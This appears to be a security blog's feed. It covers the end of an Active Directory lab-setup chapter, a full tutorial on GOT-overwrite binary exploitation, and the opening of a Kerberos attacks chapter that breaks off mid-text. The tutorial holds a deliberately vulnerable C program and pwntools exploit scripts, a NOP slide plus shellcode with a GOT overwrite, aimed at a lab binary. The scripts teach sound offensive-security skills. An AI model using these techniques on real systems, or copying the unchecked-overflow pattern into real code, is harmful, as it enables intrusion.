3.  After selecting an appropriate name, proceed through the prompts and complete the process with a system restart.

![](/content/images/2023/09/Pasted-image-20230901083902.png)

Change of machine name

## Setting up the DNS for Machine Integration into the Domain

To integrate your machine into the newly created domain, it&apos;s crucial to configure its Domain Name System (DNS) settings. This step is pivotal in ensuring seamless communication between your machine and the domain controller.

Begin by opening the Windows Internet settings. Here, navigate to &quot;Change adapter options&quot; to modify network configurations.

![](/content/images/2023/09/Pasted-image-20230901084104.png)

Internet settings

### **Configuring DNS**

Dive into the settings of Ethernet instance 0. Look for &apos;Properties&apos; and then select &quot;Internet Protocol Version 4 (TCP/IPv4)&quot;.

![](/content/images/2023/09/Pasted-image-20230901084203.png)

Access to the IPv4 configuration of the computer

In the DNS section, you&apos;ll need to input the IP address of your domain controller. This is the central hub of your network, and directing your machine to communicate with it is essential for successful domain integration.

![](/content/images/2023/09/Pasted-image-20230901084439.png)

Configure the DNS with the IP of the domain controller

To retrieve the IP address of your domain controller, use the `ipconfig` command in the Command Prompt (CMD) on the domain controller itself.  

![](/content/images/2023/09/Pasted-image-20230901084257.png)

IP of the domain controller

Once your DNS settings are in place, test the configuration. A simple yet effective way to do this is by pinging the domain you&apos;ve established. This will confirm whether your machine is correctly recognizing and communicating with the domain controller.

![](/content/images/2023/09/Pasted-image-20230901084551.png)

A sign that we have reached the domain
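A slightly fuller check can be run from the client&apos;s command prompt. The domain name below follows this lab&apos;s SHADOW.local example; substitute your own:

```bash
REM Confirm the client is using the DC for DNS and can resolve the domain
ipconfig /all
nslookup SHADOW.local
ping SHADOW.local
```

If `nslookup` resolves the domain to the DC&apos;s IP and the ping answers, the DNS configuration is correct.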

## Joining a Machine to Your Domain: Simplified Steps

To integrate a machine into your domain, the process is quite straightforward. Begin by searching for &quot;Access work or school&quot; in the Windows search bar. Inside, you&apos;ll find a &quot;Connect&quot; option, kicking off the configuration journey. Here, select &quot;Join this device to local Active Directory domain&quot; to proceed.

![](/content/images/2023/09/Pasted-image-20230901084637.png)

Search for &quot;Access Work or school&quot;

![](/content/images/2023/09/image-3.png)

Option to connect to an active directory

![](/content/images/2023/09/Pasted-image-20230901084704.png)

Join this device to a local Active Directory domain

Next, you&apos;ll be prompted to enter your domain name. This is the identity of your domain you established earlier.

![](/content/images/2023/09/Pasted-image-20230901084727.png)

Enter our domain name

After inputting the domain name, you&apos;ll need to authenticate. Enter the credentials of your domain administrator user, finalizing the connection of the machine to your domain.

![](/content/images/2023/09/Pasted-image-20230901084758.png)

Enter domain administrator&apos;s credentials

![](/content/images/2023/09/Pasted-image-20230901084829.png)

Add the account

Once these steps are completed, and if everything goes as planned, your newly added computer should proudly appear in the &quot;Computers&quot; unit of your domain controller, signifying a successful integration into your domain.

![](/content/images/2023/09/Pasted-image-20230901084933.png)

Computer sample attached correctly

## Elevating a Domain User to Administrator: The How-To Guide

Elevating a user to an administrator level on a specific machine is a crucial step for many of the attacks we&apos;ll explore. Let&apos;s dive into how to achieve this. Start by logging into your Windows machine, either with a user previously created from the domain or directly through the domain administrator user, especially if you prefer not to run tools as an administrator.

![](/content/images/2023/09/Pasted-image-20230901085101.png)

Access via user beruinsect

Your first stop is the &quot;Computer Management&quot; application. It&apos;s your control room for managing users and groups. Inside, navigate to the &quot;Groups&quot; unit and locate the &apos;Administrators&apos; group. Clicking on this group will reveal an &quot;Add&quot; button – this is your gateway to elevating a user&apos;s status.

![](/content/images/2023/09/Pasted-image-20230902122115.png)

Running Computer Management as administrator

Here&apos;s where the magic happens. Search for the user you wish to elevate – in our example, let&apos;s use &quot;beru.&quot; A handy feature here is the &quot;Check Names&quot; option, which helps in auto-completing the user name, streamlining the process. Once you&apos;ve selected your user and confirmed the name, they are on their way to joining the ranks of administrators.

![](/content/images/2023/09/Pasted-image-20230902122439.png)

Process for adding a domain user as machine administrator

If all steps are correctly followed, you should see the domain user now listed as an administrator. It&apos;s a significant milestone in setting up your domain for various attack simulations and learning experiences.

![](/content/images/2023/09/Pasted-image-20230902122253.png)

Verification that the user was added successfully
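The same elevation can be done without the GUI from an elevated command prompt. The domain and user names below (`SHADOW\beru`) follow this lab&apos;s examples; substitute your own:

```bash
REM Add the domain user to the local Administrators group (elevated prompt)
net localgroup Administrators SHADOW\beru /add

REM Verify the membership
net localgroup Administrators
```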

## Activating SMB for Enhanced Network Functionality

Enabling SMB is a straightforward process, pivotal for practicing reconnaissance techniques and attacks such as NTLM relay. The journey begins in the file browser, where a click on the &quot;Network&quot; tab unveils the next steps.

![](/content/images/2023/09/Pasted-image-20230902122535.png)

Network access from the file explorer

Initially, an error message greets us, indicating that SMB is not currently active. It&apos;s a minor roadblock, quickly cleared by removing the error notice. What follows is a prompt displayed as a yellow bar, a signal to initiate network discovery and file sharing.

![](/content/images/2023/09/Pasted-image-20230902122559.png)

SMB disabled error

This prompt is our cue to action. By selecting &quot;Turn on network discovery and file sharing&quot;, we ignite the process of activating SMB. This step is more than a mere click; it&apos;s the activation of a crucial service, laying the groundwork for a range of network-based exercises and explorations.

![](/content/images/2023/09/Pasted-image-20230902122615.png)

We start the SMB service on the machine

# Wrapping Up: Building a Robust Active Directory Lab in Proxmox

In this chapter, we&apos;ve journeyed through the meticulous process of configuring a functional Active Directory environment within Proxmox. Our path has led us from installing essential drivers for Windows machines to setting up a robust Active Directory domain, rich with opportunities for practicing diverse attacks.

We&apos;ve navigated through various configurations, from aligning DNS settings for domain connectivity to integrating machines into our domain. Each step, crafted with precision, has contributed to a structured and organized domain landscape, ideal for delving into advanced attack strategies.

Key to our setup has been the creation and management of user accounts, including domain administrators and service accounts. These accounts, carefully crafted and managed, provide a realistic backdrop for simulating attacks like NTLM Relay, Password Spraying, Kerberoasting, and more.

Moreover, we&apos;ve enabled SMB on our machines, a crucial step that opens doors to a plethora of reconnaissance techniques and network-based attacks. This activation not only enhances our lab&apos;s functionality but also aligns it closely with real-world network environments.

In essence, this chapter serves as a cornerstone in building a comprehensive hacking lab, one that not only facilitates learning and experimentation but also mirrors the complexities and nuances of actual Active Directory environments. It&apos;s a foundation upon which we can continue to build, explore, and refine our skills in the dynamic world of cybersecurity.

# Tips of the article


&lt;details&gt;
&lt;summary&gt;What do I have to do in Proxmox on Windows machines if I want to be able to access the internet?&lt;/summary&gt;

I have to install the necessary drivers through the &quot;Device Manager&quot;.
&lt;/details&gt;

&lt;details&gt;
&lt;summary&gt;Which package is essential for me to install in order to create an active directory domain?&lt;/summary&gt;

Under &quot;Add Roles and Features&quot; in the &quot;Server Manager&quot; I have to install the package &quot;Active Directory Domain Services&quot;.
&lt;/details&gt;

&lt;details&gt;
&lt;summary&gt;Which package do I have to install to be able to attack LDAPs?&lt;/summary&gt;

I have to install the certificate authority in &quot;Add Roles and Features&quot; through the &quot;Server Manager&quot;.
&lt;/details&gt;

&lt;details&gt;
&lt;summary&gt;Could you tell me some attacks that I could practice focused on users? And focused on service accounts (SPNs)?&lt;/summary&gt;

User accounts let me practice enumeration, brute-force, and password-spraying attacks, and also simulate attacks such as NTLM relay or network poisoning. Service accounts (SPNs), on the other hand, let me perform the Kerberoasting attack.
&lt;/details&gt;

&lt;details&gt;
&lt;summary&gt;What do I have to add in the network configuration of the Windows machines so that they can ping the domain?&lt;/summary&gt;

I have to set the machine&apos;s DNS server to the domain controller.
&lt;/details&gt;

&lt;details&gt;
&lt;summary&gt;What do I have to do to get crackmapexec to return a &quot;Pwn3d!&quot; with the credentials of a specific user?&lt;/summary&gt;

I have to make that user a local administrator of the machine (or domain). To promote it to administrator, I have to go to &quot;Computer Management&quot; and add the user to the administrators group.
&lt;/details&gt;

# References

Most of the active directory configuration has been based on the following fantastic video from CyberMentor :)</content:encoded><author>Ruben Santos</author></item><item><title>Advanced Exploits: Overcoming Restrictions with GOT and PLT</title><link>https://www.kayssel.com/post/exploitation-of-code-from-dynamic-function-resolution</link><guid isPermaLink="true">https://www.kayssel.com/post/exploitation-of-code-from-dynamic-function-resolution</guid><description>Expanding Exploit Techniques: This chapter delves into complex exploit scenarios, utilizing GOT and PLT knowledge to bypass advanced code restrictions, enhancing our toolkit with dynamic function resolution strategies.</description><pubDate>Sat, 22 Jul 2023 16:53:36 GMT</pubDate><content:encoded>### Introduction: Navigating Complex Exploits with GOT and PLT

In the world of exploit development, we often encounter scenarios that don&apos;t fit the straightforward mold. The previous chapters provided us with insights and techniques for simpler exploits. However, the real challenge begins when we face vulnerable codes that defy conventional exploitation methods. This chapter is dedicated to addressing such complexities.

**Expanding Our Exploitation Horizons:**

1.  **Beyond Basic Exploits**: We&apos;re moving away from the simplicity of earlier exploits to tackle more intricate and less straightforward vulnerabilities.
2.  **Utilizing Dynamic Function Resolution**: Our focus shifts to leveraging the knowledge of dynamic function resolution, particularly the intricacies of the Global Offset Table (GOT) and Procedure Linkage Table (PLT). These concepts, initially introduced in [chapter 4](https://www.kayssel.com/post/binary-4/), will now become our primary tools in overcoming advanced restrictions.
3.  **Adapting to Code Constraints**: We&apos;ll explore strategies to navigate around coding structures that prevent traditional exploit methods. This includes codes ending with functions like &apos;exit()&apos; or trapped in infinite loops, which pose unique challenges in exploitation.
4.  **Expanding the Toolkit**: As we dive deeper into the nuances of GOT and PLT, the importance of a versatile toolkit becomes evident. We&apos;ll continue to harness tools like radare2 and pwntools, not just as aids but as essential elements in our exploit development process.

**Embarking on a New Chapter:**

As we embark on this chapter, we&apos;re not just learning a new technique; we&apos;re adapting to the evolving landscape of exploit development. This journey will enhance our ability to think critically, adapt our strategies, and effectively utilize the tools at our disposal. Let&apos;s dive in and add another powerful technique to our growing repertoire of exploit development.

# **Exploiting GOT for Program Flow Hijacking**

In the intricate world of binary exploitation, we often encounter seemingly impervious functions within binaries, such as those terminating with &quot;exit()&quot; or trapped in infinite loops. These situations present a unique challenge: they hinder our ability to overwrite the return address and hijack the program&apos;s execution flow. However, there&apos;s a silver lining in this complex scenario, and it lies in the strategic use of the Global Offset Table (GOT).

## **Understanding GOT&apos;s Role in Exploits:**

1.  **GOT as an Arbitrary Writing Point:** Introduced in [Chapter 4](https://www.kayssel.com/post/binary-4/), the GOT plays a crucial role in dynamic function linking. Its structure offers us a potential target for exploitation. If we can exploit a vulnerability that permits overwriting memory data, we can manipulate the GOT entries of dynamically linked functions. This manipulation paves the way for redirecting the execution flow to our desired destination – our crafted shellcode.
2.  **Hijacking with Precision:** The exploitation of GOT revolves around altering specific entries. By rewriting these entries, we can ensure that the next time the program calls a dynamically linked function, it doesn’t jump to the standard library code. Instead, it leaps straight into the jaws of our shellcode, effectively hijacking the program’s behavior.
3.  **Bypassing Conventional Barriers:** This approach circumvents the limitations posed by secure functions and infinite loops. By focusing on the GOT, we target a universal aspect of dynamically linked binaries, opening up new avenues for exploit development.
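The indirection itself can be modeled in a few lines of Python (a toy sketch, not the real dynamic linker): calls routed through a table keep working normally until a single entry is overwritten, after which every later call through the same call site lands in attacker code.

```python
# Toy model of GOT-style indirection (illustrative only, not the real linker).
def libc_exit():
    return "normal exit() from libc"

def shellcode():
    return "attacker shellcode runs instead"

# The "GOT": dynamically linked calls go through this table,
# never jumping to libc directly.
got = {"exit": libc_exit}

def call(name):
    return got[name]()  # one extra level of indirection per call

print(call("exit"))     # normal exit() from libc

# An arbitrary-write primitive lets us overwrite the table entry...
got["exit"] = shellcode

# ...so the very same call site now executes our code.
print(call("exit"))     # attacker shellcode runs instead
```

The call site never changes; only the table does, which is exactly why this works even when the return address is out of reach.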

## **Crafting the Exploit:**

The key to a successful GOT exploit lies in a deep understanding of the binary&apos;s structure and the behavior of its dynamically linked functions. It requires meticulous planning and precision in execution. The rewards, however, are substantial – the ability to control program flow even in the most resilient binaries.

This chapter will guide you through the nuances of exploiting the GOT, demonstrating techniques to turn this table to your advantage. Whether you&apos;re bypassing security measures or overcoming structural challenges, mastering GOT manipulation is a powerful addition to your exploit toolkit.

# **Illustrating GOT Exploitation with a Vulnerable Code Example**

To provide a practical understanding of how GOT can be exploited, let&apos;s delve into an example of vulnerable code, adapted from the &quot;[Guia de Exploits](https://fundacion-sadosky.github.io/guia-escritura-exploits/).&quot; This code, while seemingly complex at first glance, offers a perfect scenario to demonstrate GOT manipulation.

```c
#include &lt;stdlib.h&gt;
#include &lt;string.h&gt;

/* note: the parameter names are swapped in this example:
   argc is the argument array and argv the argument count */
int main(int argv, char **argc) {
        char *pbuf = malloc(4);
        char buf[256];

        strcpy(buf, argc[1]);              /* no bounds check: can overflow into pbuf */
        for (; *pbuf++ = *(argc[2]++); );  /* copies argc[2] to wherever pbuf points */
        exit(1);
}
```

## **Breaking Down the Vulnerable Code:**

1.  **Memory Allocation and Pointers:**
    -   The code begins by allocating a 4-byte memory space using the `malloc` function. This allocated space is referenced by the pointer `pbuf`.
    -   Essentially, `pbuf` acts as a marker, pointing to a specific location in memory where we can store or manipulate data.
2.  **Buffer Creation and Data Copy:**
    -   A buffer, `buf`, is declared with a capacity of 256 characters. This buffer is designed to store data passed as an argument (`argc[1]`).
    -   The `strcpy` function copies the content of `argc[1]` into `buf`, replicating the input data within the program&apos;s memory.
3.  **Iterative Data Transfer:**
    -   The subsequent `for` loop iterates over the characters in `argc[2]`, transferring each character to the memory space pointed to by `pbuf`.
    -   This loop continues until it reaches the end of the string in `argc[2]`, effectively copying its content into the space allocated by `malloc`.
4.  **Program Termination:**
    -   The final act of the program is to invoke the `exit` function, terminating the execution.

## **Identifying the Vulnerability**

At the core of this code lies a critical vulnerability: the lack of bounds checking. The `strcpy` function and the `for` loop do not verify the length of the input data, leading to potential buffer overflows. This oversight opens a window for attackers to manipulate memory, particularly the GOT, to divert the program flow.

## **Exploitation Strategy**

The exploit strategy involves carefully crafting input that overflows the `buf` buffer and manipulates the memory space pointed to by `pbuf`. By doing so, we aim to overwrite specific GOT entries, redirecting function calls to our shellcode. This requires precise knowledge of the memory layout and the functions used by the binary.

In the following sections, we&apos;ll walk through the steps of constructing and deploying an exploit that leverages this vulnerability, turning a seemingly benign program into a gateway for GOT manipulation and control flow hijacking.
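The pointer-overwrite step can be sketched in plain Python before touching the real binary. This toy model assumes the simplified layout described above (buf&apos;s 256 bytes immediately below the slot holding pbuf; real compilers may insert padding, so the exact distance is confirmed in a debugger), and borrows the GOT address used later in the chapter:

```python
# Toy stack model: [ buf (256 bytes) ][ pbuf pointer (4 bytes) ]
BUF_SIZE = 256
stack = bytearray(BUF_SIZE + 4)
# pbuf initially points at the malloc'd chunk (placeholder address)
stack[BUF_SIZE:] = (0xDEADBEEF).to_bytes(4, "little")

GOT_EXIT = 0x0804C018  # GOT entry of exit(), as used later in the chapter
payload = b"A" * BUF_SIZE + GOT_EXIT.to_bytes(4, "little")

# strcpy(buf, argv[1]) with no bounds check: the copy runs past buf...
stack[:len(payload)] = payload

# ...and the four overflow bytes have silently replaced the pbuf pointer.
pbuf = int.from_bytes(stack[BUF_SIZE:], "little")
print(hex(pbuf))  # 0x804c018
```

After the overflow, the program&apos;s own copy loop writes through pbuf, i.e. straight into the GOT.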

# **Exploit Strategy: Redirecting Control Flow via GOT Manipulation**

In this scenario, we encounter a unique challenge: the inability to directly modify the return address due to the program&apos;s use of the `exit` function. To navigate this obstacle, we&apos;ll employ a strategy centered around manipulating the Global Offset Table (GOT). This approach diverges from the methods used in previous chapters, focusing instead on altering GOT entries to redirect the program&apos;s execution flow.

## **The Core of the Attack Strategy**

1.  **Targeting the GOT:**
    -   Our primary goal is to modify an entry within the GOT. By altering this entry, we can redirect the dynamic linking process, causing the program to execute our shellcode instead of the intended library code.
    -   The chosen target for modification will be the GOT entry for the `exit` function.
2.  **Shellcode Placement:**
    -   We&apos;ll store our shellcode within the `buf` variable. This placement is strategic, leveraging the buffer overflow vulnerability to store our malicious code.
3.  **Exploiting Buffer Overflow:**
    -   The program&apos;s lack of bounds checking when copying data to `buf` will be exploited to trigger a buffer overflow.
    -   Through this overflow, we aim to modify the `pbuf` pointer, redirecting it to the GOT entry of the `exit` function.
4.  **Visualizing the GOT:**
    -   It&apos;s helpful to conceptualize the GOT as a table containing entries for functions requiring dynamic linking. Each entry points to the actual code to be executed.
    -   In our exploit, we&apos;ll manipulate the `pbuf` pointer to point to the `exit` function&apos;s GOT entry, preparing to overwrite it with the address of our shellcode.
5.  **Modifying the GOT Entry:**
    -   The program&apos;s loop that modifies the content of the memory space pointed to by `pbuf` plays a crucial role. This loop will be used to inject the stack address of the `buf` variable (containing our shellcode) into the GOT.
    -   By doing so, we effectively change the program&apos;s execution flow to our shellcode when the `exit` function is called.

## **Gathering Required Addresses**

To successfully execute this exploit, we need to obtain specific memory addresses:

-   The GOT entry for the exit function: This crucial address can be directly retrieved using radare2. By executing commands like `pd @ got.plt`, we can swiftly pinpoint the GOT entry corresponding to the exit function.
-   The stack address of the buf variable: Unlike the exit function&apos;s GOT entry, the stack address of the buf variable will be determined dynamically as we develop and refine the exploit. Observing how our payload interacts with the program&apos;s memory during execution will guide us in identifying this critical address.

![](/content/images/2023/07/image.png)

GOT sample of the vulnerable program

## **Summary of the Attack**

The following diagram provides a visual summary of our exploit strategy, highlighting the critical points of GOT manipulation and buffer overflow to achieve control flow redirection. This methodical approach sets the stage for a successful exploitation of the vulnerability, turning a constrained environment into an opportunity for shellcode execution.

![](/content/images/2023/07/image-21.png)

Attack diagram

# **Breaking Down the Code in Radare2: A Step-by-Step Analysis**

We dive into the heart of our vulnerable program using radare2, an essential tool in our hacking toolkit. Using straightforward commands, we unravel the mystery behind the assembly code, translating it effortlessly back to our source code discussed at the beginning of the chapter.

```bash
r2 ./vulnerable
aaa
pdf @dbg.main

```

![](/content/images/2023/07/image-2.png)

Binary assembly code

The initial parts of the code, involving dynamic memory allocation to the `pbuf` pointer and copying user input into the `buf` variable, are fairly straightforward.

![](/content/images/2023/07/image-17.png)

Memory space creation code

![](/content/images/2023/07/image-19.png)

Copy from argv\[1\] to buf

It&apos;s the third segment, representing the &quot;for&quot; loop, where things get spicy!

![](/content/images/2023/07/image-8.png)

Copy of argv\[2\] to the memory space pointed to by pbuf.

  
  
The first highlighted instruction is crucial: it moves the memory address pointing to `argv[2]` into `edx`. Think of it as setting the stage for the critical third point in our journey. By using the `pxr` command in radare2, we can peek into the destination of this memory address, much like a detective piecing together clues.

![](/content/images/2023/07/image-10.png)

Memory address of pbuf and memory space it points to 

  
Moving to the second highlight, we see the loading of the `pbuf` variable value into `eax`. This is where our exploit takes shape: `eax` needs to hold the memory address of the GOT entry we want to tweak. Imagine aiming your hacking skills precisely at the bullseye of the GOT table, as shown in the earlier diagram.

The final highlight in our code analysis reveals the two instructions that crucially copy the value from `argv[2]` (our key to executing the shellcode) into the location pointed to by `pbuf`. This dance of bytes and addresses continues until `al` hits zero, signaling the end of our string.

To bring this to life, consider the example in the dynamic code execution diagram. In it, `eax` aligns with the memory address of the `exit` entry in the GOT, while `edx` holds a byte from `argv[2]`. It&apos;s like watching the final pieces of our hacking puzzle snap into place.

![](/content/images/2023/07/image-11.png)

Dynamic analysis of the for loop
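Assuming pbuf has already been redirected to the exit() GOT entry, the for loop&apos;s byte-wise copy can be mimicked in plain Python (addresses are illustrative):

```python
# Mimic the loop *pbuf++ = *(argc[2]++); it stops once a zero byte is copied.
got = bytearray(8)                    # fake GOT: exit() slot plus the next slot
buf_addr = 0xFFFFC774                 # example stack address of buf
argv2 = buf_addr.to_bytes(4, "little") + b"\x00"  # argv strings end in a NUL

i = 0
while True:
    got[i] = argv2[i]
    if argv2[i] == 0:                 # the copied NUL terminates the loop
        break
    i += 1

entry = int.from_bytes(got[:4], "little")
print(hex(entry))  # 0xffffc774
```

Note that the copy also writes argv\[2\]&apos;s terminating NUL, clobbering one byte past the 4-byte entry (the sketch&apos;s 8-byte table makes this visible); harmless here, but worth knowing.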

# Crafting the GOT Exploit: Two-Pronged Approach Using Radare2

In our exploit journey, we&apos;re set to develop two separate payloads, each tailored for specific arguments (argv\[1\] and argv\[2\]). Our toolkit? Primarily radare2, stepping away from pwndbg for this round.

## Exploit argv\[1\]: Buffer Overflow and NOPs Strategy

The first exploit plays a critical role in our overall strategy. It leverages a buffer overflow to manipulate the `pbuf` pointer, directing it to our desired GOT entry. But there&apos;s more - it&apos;s not just about redirection. We also need to ensure the execution of our shellcode, and for that, we introduce NOPs (No Operation instructions).

NOPs are our safety net - they don&apos;t alter the code but create a slide, a runway for our shellcode to execute smoothly. Let&apos;s say the exact start of our `buf` is a mystery; NOPs extend our landing zone, giving us a better chance at a successful exploit.

![](/content/images/2023/07/image-12.png)

Stack diagram filled with NOPs and shellcode

So, imagine a stack peppered with NOPs, leading to our shellcode. It&apos;s a cushion, a preparation for the final act - executing the &quot;Hello&quot; message via our shellcode. For this, we employ pwntools&apos; &quot;shellcraft&quot; utility, a familiar friend from our previous exploits.

```python
#!/usr/bin/env python3

from pwn import *

context.update(arch=&quot;i386&quot;, os=&quot;linux&quot;)
context.terminal = [&quot;kitty&quot;, &quot;-e&quot;, &quot;sh&quot;, &quot;-c&quot;]
shellcode = shellcraft.echo(&quot;Hello\n&quot;, constants.STDOUT_FILENO)

payload = b&apos;\x90&apos; * 50  # The NOP slide
payload += asm(shellcode)  # Our crafted message
payload += cyclic(256 - 50 - len(asm(shellcode)))  # Precise padding
payload += p32(0x0804c018)  # Target GOT entry

sys.stdout.buffer.write(payload)
```
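If pwntools isn&apos;t at hand, the 260-byte layout of this payload can be sanity-checked with the standard library alone. The shellcode is stubbed with a placeholder (shellcraft&apos;s output length varies by version), and the GOT address is the same value the exploit packs with p32:

```python
# Rebuild the payload skeleton with the stdlib only.
shellcode = b"\xcc" * 37   # stand-in for asm(shellcraft.echo(...)); length varies
nops = b"\x90" * 50        # the NOP slide
padding = b"B" * (256 - len(nops) - len(shellcode))  # fill buf to 256 bytes
got_exit = (0x0804C018).to_bytes(4, "little")        # same bytes p32() produces

payload = nops + shellcode + padding + got_exit
assert len(payload) == 260   # 256-byte buf + 4-byte pbuf overwrite
print(payload[-4:].hex())    # 18c00408
```

Whatever the shellcode length, the padding shrinks to compensate, so the final four bytes always land exactly on the pbuf slot.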

### Validating Our Approach with Radare2

To test the mettle of our exploit, we turn to radare2. It&apos;s our window into the inner workings of the vulnerable program, allowing us to validate if our strategic manipulations bear fruit.

```bash
r2 ./vulnerable
ood `!python3 exploit.py` AAAA

```

Executing our exploit, we observe the desired shift in execution flow. The program, now hijacked, obediently follows our redirect to &quot;0x41414141&quot; (AAAA). It&apos;s a moment of triumph, a testament to our exploit&apos;s effectiveness.

![](/content/images/2023/07/image-13.png)

Sample of successful execution flow change

## Crafting the Second Wave: Exploit for argv\[2\]

Our journey through the treacherous waters of exploitation now brings us to crafting the second argument – the key to unlocking the destination of our shellcode.

### Navigating to the Shellcode&apos;s Hideout

Our primary task with this argument is straightforward yet crucial. We need to ensure that the &apos;pbuf&apos; pointer is set sail directly to the memory address housing our shellcode – nestled within the &apos;buf&apos; variable.

### **Setting the Course with Precision**

Our exploit&apos;s success hinges on pinpoint accuracy. We need the exact memory address where &apos;buf&apos; begins, as this is where our shellcode awaits its cue. To pinpoint this location, we drop an anchor right after the strcpy function.

![](/content/images/2023/07/image-14.png)

Breakpoint after copying the payload to the stack. 

### **Charting the Stack&apos;s Depths**

With the strategic placement of NOPs at the outset of our exploit, identifying the start of our shellcode becomes easier. These NOPs create a visible trail on the stack, guiding us to the exact location of &apos;buf&apos;. The illustration below reveals how our payload appears on the stack, with the NOPs making our target location unmistakable.

![](/content/images/2023/07/image-16.png)

Memory address of the variable buf

### **Preparing the Second Payload**

Armed with the knowledge of where our shellcode begins, we can now prepare the second payload. This payload&apos;s mission is singular – to ensure &apos;pbuf&apos; points to our shellcode&apos;s starting line. The payload would be a simple yet precise command, leading &apos;pbuf&apos; to the memory address of &apos;buf&apos;.

```python
#!/usr/bin/env python3
from pwn import *

context.update(arch=&quot;i386&quot;, os=&quot;linux&quot;)

payload = b&apos; &apos;               # leading filler byte, kept from the original payload
payload += p32(0xffffc774)   # stack address of buf, found dynamically in radare2

sys.stdout.buffer.write(payload)
```

Upon deploying this payload, we can validate our success in radare with the following command: `ood &apos;!python3 exploit.py&apos; &apos;!python3 address.py&apos;`. If our calculations are correct, we should witness the successful execution of our code, a testament to our meticulous planning and execution.

![](/content/images/2023/07/image-15.png)

Execution of the program in radare2

# Conclusion: Mastering GOT Exploitation

In this chapter, we&apos;ve delved deep into the intricacies of exploiting the Global Offset Table (GOT) to navigate around the constraints of a program that uses functions like &apos;exit()&apos; or is locked in an infinite loop. Our journey has shown that even when direct control over the return address is not feasible, there&apos;s still a path to successful exploitation.

**Key Takeaways:**

1.  **Strategic Use of GOT**: We&apos;ve learned that the GOT, a crucial part of dynamic function linking, can be a valuable target for exploitation. By altering a GOT entry, we redirect the dynamic linking process to execute our shellcode.
2.  **Buffer Overflow and Shellcode Execution**: Our exploits demonstrated the effective use of buffer overflow to manipulate the &apos;pbuf&apos; pointer. We also saw the importance of precise shellcode placement within the &apos;buf&apos; variable and the role of NOPs in ensuring successful execution.
3.  **Two-Part Exploit Approach**: The development of two separate payloads for argv\[1\] and argv\[2\] highlighted the need for a multifaceted strategy in complex exploits. The first exploit leveraged a buffer overflow, while the second precisely directed the &apos;pbuf&apos; pointer to our shellcode.
4.  **Tool Utilization**: This chapter underscored the importance of tools like radare2 and pwntools in developing and testing exploits. Radare2 was pivotal in examining the stack and determining the exact location for our shellcode, while pwntools facilitated the creation of effective payloads.
5.  **Adaptability in Exploit Development**: Our journey emphasized the need for adaptability in the face of challenging exploit scenarios. When traditional methods were not applicable, we adapted our approach to use the GOT, demonstrating that there are multiple pathways to achieve exploitation goals.

**Looking Ahead:**

As we continue to explore the realm of exploitation, the lessons learned in this chapter will serve as a foundation for tackling even more complex scenarios. The ability to think creatively, adapt strategies, and utilize various tools will be invaluable in overcoming the challenges that lie ahead in the art of exploitation.

# Tips of the article


&lt;details&gt;
&lt;summary&gt;What can we use to get our exploit executed in case the program is in an infinite loop or terminates using the &quot;exit()&quot; function?&lt;/summary&gt;

We could use the GOT to modify dynamic linking so that when the relocation process of a function is performed, the code pointed to is the one introduced by our exploit.
&lt;/details&gt;

&lt;details&gt;
&lt;summary&gt;How can we find the .got section inside the binary with radare2?&lt;/summary&gt;

We can use the &quot;iS&quot; command to display the different sections of the binary. Then using the &quot;pd&quot; command we can display the assembler code of the memory address corresponding to the .got.
&lt;/details&gt;

&lt;details&gt;
&lt;summary&gt;What does the &quot;NOP&quot; instruction do and how can it be useful in exploit development?&lt;/summary&gt;

The &quot;NOP&quot; instruction, as its name (&quot;No Operation&quot;) indicates, does nothing. However, it is really useful in our exploits when we do not know exactly where our shellcode will start executing.
&lt;/details&gt;

&lt;details&gt;
&lt;summary&gt;What can I do to make a Python script write its output as raw bytes so that we can use it to test our exploit together with radare2?&lt;/summary&gt;

I have to make the output produced by our script (normally the payload) be written as raw bytes, like this:

```python
sys.stdout.buffer.write(payload)

```

Then, using the following radare2 command, we can see how the code responds to our exploit:

```bash
ood `!python3 exploit.py` `!python3 address.py`

```
&lt;/details&gt;

# References

[Guía de auto-estudio para la escritura de exploits · Guía de exploits](https://fundacion-sadosky.github.io/guia-escritura-exploits/)</content:encoded><author>Ruben Santos</author></item><item><title>Decoding Kerberos: Understanding the Authentication Process and Main Attacks</title><link>https://www.kayssel.com/post/kerberos</link><guid isPermaLink="true">https://www.kayssel.com/post/kerberos</guid><description>Explore Kerberos&apos; mechanics and key attacks in a lab setting. Learn authentication steps, and master techniques like Kerberoast and Golden Ticket for practical cybersecurity skills</description><pubDate>Sat, 24 Jun 2023 14:32:08 GMT</pubDate><content:encoded># **Unraveling Kerberos: A Deep Dive into Authentication and its Vulnerabilities**

Welcome back to our ongoing series on mastering the nuances of cybersecurity! In this chapter, we pivot our focus to the Kerberos authentication protocol, dissecting its complexities and exploring the vulnerabilities inherent in its design. Kerberos, a cornerstone of modern authentication frameworks, plays a pivotal role in user authentication and authorization within networked environments.

Our journey will take us through the labyrinth of the Kerberos process, from ticket requests to the intricacies of ticket-granting services. As we traverse this terrain, we&apos;ll demystify each component of the protocol, shedding light on both its strengths and potential weaknesses.

In addition to understanding the theoretical aspects of Kerberos, we&apos;ll dive into practical applications. We&apos;ll examine how to replicate some of the most notorious Kerberos-based attacks in a lab setting, providing a hands-on perspective on how these vulnerabilities can be exploited. This approach not only aids in better understanding the protocol but also equips us with the knowledge to anticipate and mitigate real-world threats.

As we embark on this chapter, prepare to delve into the world of Kerberos authentication, unraveling its secrets and learning how to safeguard against its exploitation. Whether you&apos;re a seasoned security professional or an enthusiastic learner, this chapter promises to be a valuable addition to your cybersecurity repertoire. Let&apos;s get started on this fascinating journey!

# Understanding Kerberos Authentication: The Ticket-Based Journey

## Summarized Process

Diving into the realm of network security, let&apos;s unravel the complexities of Kerberos - a pivotal protocol in user authentication and authorization. Imagine Kerberos as a digital gatekeeper, managing access in a domain through a system of tickets. Here&apos;s the deal: when a user seeks entry into the domain kingdom, they knock at the door of the Key Distribution Center (KDC), essentially the domain controller. If the KDC approves, it hands over a golden key, the Ticket Granting Ticket (TGT). This TGT is like a passport, granting the user the privilege to request access to various domain services.

Now, whenever the user desires to engage with a specific service within the domain, they present their TGT to the KDC. In response, the KDC issues a new ticket, the Ticket Granting Service (TGS) ticket. The user then takes this TGS to the service&apos;s doorstep. The service, upon verifying the authenticity and authorization level of the TGS, rolls out the red carpet, allowing access.

![img](/content/images/2023/06/2023-06-06_09-02-39_screenshot.png)

Kerberos&apos; authentication process diagram

This whole ticket-exchanging ceremony might seem intricate, but it&apos;s a dance of security and efficiency. Don&apos;t stress if it seems a bit tangled at first glance - we&apos;ll unravel each step, ensuring clarity in this digital ballet of authentication.
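The two round trips above can be condensed into a toy Python model (fields are simplified; real Kerberos messages are ASN.1-encoded and the sensitive parts are encrypted, not plaintext, and the SPN below is just an example):

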